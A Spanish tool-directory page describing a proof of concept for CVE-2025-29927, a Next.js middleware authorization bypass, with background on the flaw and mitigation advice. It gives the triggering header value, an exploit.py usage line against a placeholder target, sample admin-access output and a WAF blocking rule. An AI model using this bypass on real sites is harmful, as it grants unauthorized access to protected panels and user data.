Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-29927-PoC — Aquí tienes un exploit simple pero efectivo para CVE-2025-29927. | Kitploit
Herramientas/GitHubGitHub/w2hcorp/cve-2025-29927-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónRed Teaming
GitHubw2hcorp/cve-2025-29927-poc

CVE-2025-29927-PoC

Aquí tienes un exploit simple pero efectivo para CVE-2025-29927.

Ver Repositorio
113hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-29927 - Bypass de autorización en el middleware de Next.js (PoC)

Este repositorio contiene una prueba de concepto (PoC) para CVE-2025-29927, una vulnerabilidad crítica en Next.js que permite a los atacantes eludir las comprobaciones de autorización abusando de un encabezado HTTP específico del middleware.


Resumen

  • ID de CVE: CVE-2025-29927
  • Gravedad: Crítica (CVSS 9.1)
  • Framework afectado: Next.js
  • Tipo de vulnerabilidad: Omisión de autorización
  • Vector de explotación: Encabezado de solicitud HTTP
  • Complejidad de explotación: Baja
  • Autenticación requerida: No

Acerca de la vulnerabilidad

Las aplicaciones Next.js a menudo dependen del middleware para la autorización y el control de acceso. Este CVE se origina por un fallo lógico en la forma en que se procesa el encabezado x-middleware-subrequest. Cuando este encabezado se establece en middleware, el servidor puede asumir incorrectamente que la solicitud se originó en la lógica interna y .

omitir la autenticación basada en middleware

Esto puede permitir a los atacantes acceder a paneles de administración, API protegidas o datos de usuario — sin credenciales ni sesión válida.


Exploit PoC

Proporcionamos un sencillo script de Python para comprobar si una aplicación Next.js es vulnerable.

▶️ Uso

root@kitploit:~
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]

Salida de ejemplo

root@kitploit:~
[+] Sending request to: https://target.com/admin
[+] Using header: x-middleware-subrequest: middleware
[+] Status Code: 200
[+] Response Body (first 500 chars):
<!DOCTYPE html><html><head>...You are logged in as admin...

Dependencias

  • Python 3.6+
  • Librería requests

Mitigación

  • Actualice a la última versión parcheada de Next.js.
  • Evite usar x-middleware-subrequest como señal de confianza.
  • Implemente validación de sesión en el servidor y comprobaciones de autorización adecuadas en las rutas protegidas.
  • Considere añadir reglas WAF/IDS para bloquear o marcar el uso sospechoso de este encabezado.

Lógica WAF:

root@kitploit:~
if header 'x-middleware-subrequest' == 'middleware':
    block_request()

Divulgación y créditos

Este PoC fue desarrollado por el equipo de Seguridad Ofensiva de W2H Corp. como parte de nuestros esfuerzos continuos de investigación de vulnerabilidades. La publicación original con la explicación del CVE está aquí.

Descargar herramienta